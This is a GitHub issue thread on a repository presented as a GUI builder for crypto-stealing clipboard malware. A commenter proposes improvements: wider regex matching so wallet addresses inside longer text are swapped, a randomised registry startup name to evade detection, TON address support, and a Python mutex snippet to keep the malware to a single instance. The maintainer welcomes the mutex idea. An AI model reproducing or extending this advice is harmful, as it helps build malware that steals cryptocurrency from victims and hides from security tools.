search

3022-2 / raccoon_clipper

A GUI based program for making customised crypto stealing malware written in python
GNU General Public License v3.0
10 stars 5 forks source link

A few suggestions #5

Open iBiocide opened 4 days ago

iBiocide commented 4 days ago

First of all nice code, good job.

  1. the clipboard search doesn't need to exactly match the regex. just search for the regex in the string and see if it matches any part of it then change the match to the wallet address and leave the rest untouched, and give it back to clipboard. this way if the wallet is between a line for example " Here is my wallet : BTC WALLET ADRESS" then the clipper also changes the wallet and returns the text to clipboard otherwise it can not recognize it.
  2. randomize the registry startup entry name for less detection
  3. add TON adresses regex as it is kinda pretty famous now days
  4. and i forgot to add, the malware doesn't work after the restart or simply by closing the app and running it again from the startup folder. it is running in taskmanager but not clipping anything.
  5. add mutex 
    
from win32event import CreateMutex
from win32api import CloseHandle, GetLastError
from winerror import ERROR_ALREADY_EXISTS
import sys

class singleinstance:

def __init__(self):
    self.mutexname = "somerandomstring"
    self.mutex = CreateMutex(None, False, self.mutexname)
    self.lasterror = GetLastError()

def alreadyrunning(self):
    return (self.lasterror == ERROR_ALREADY_EXISTS)

def __del__(self):
    if self.mutex:
        CloseHandle(self.mutex)

myapp = singleinstance()

if myapp.alreadyrunning(): sys.exit(1)

3022-2 commented 3 days ago

Cheers, I won't be fixing the clipper unfortunately. I've moved onto other projects. I'll implement the mutex into the new stuff.